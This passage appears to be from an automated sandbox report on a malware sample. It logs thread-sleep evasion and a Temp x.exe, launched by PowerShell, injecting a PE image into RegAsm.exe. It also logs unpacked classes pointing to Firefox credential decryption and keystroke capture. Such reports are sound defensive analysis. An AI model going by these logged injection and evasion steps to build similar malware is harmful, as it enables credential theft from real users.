            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -599217s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -599104s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -598787s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -598649s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -598530s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -598421s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -598093s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -597871s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -597750s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -597640s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -597526s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -597297s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -597184s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -597062s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -596953s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -596843s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -596515s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -596297s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -596186s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -595968s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -595750s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -595640s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -595421s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -595312s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -595203s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -595093s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -594984s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -594875s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -594759s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -594526s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -594404s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -594294s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -594172s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -593984s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -593744s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660Thread sleep time: -593609s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599559Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599444Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599217Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599104Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598787Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598649Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598530Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597871Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597526Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597184Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596186Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594759Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594526Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594404Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594294Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593744Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593609Jump to behavior
            Source: RegAsm.exe, 00000006.00000002.3754179576.0000000001472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0306C168 LdrInitializeThunk,LdrInitializeThunk,6_2_0306C168
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
            Source: 4.2.x.exe.2d0b410.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 414000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 416000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1093008Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX&S
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH('
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|-W
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4b0
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd=p
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXhH
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\.G
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0zA
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxG%
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT`;
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpUs
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q44
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$`h
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qx%t
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,S,
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,0i
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8)8
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|P7
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`X\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpz+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$!@
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDA;
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\/P
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLPd
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0{J
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlp_
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<1.
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q {T
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8Hl
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXhg
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlNy
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|ok
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<s/
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh'5
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL/Z
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\Q)
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8'b
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<1%
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXG]
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPWv
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhi,
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd?F
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(jK
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXF5
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp4J
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8%N
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(Fb
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q5\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|,/
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`4T
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|LM
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@vv
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT^F
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qVf
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlLW
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8G'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|n&
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh#K
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@5D
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxdZ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4<w
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH%)
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX#U
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`x>
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT?1
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@79
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(iB
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT_O
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\,q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<-u
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$?^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4a-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`W4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd~x
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0Wa
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLO<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPw\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhDt
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@6M
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlo7
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<od
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qwp
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q 8+
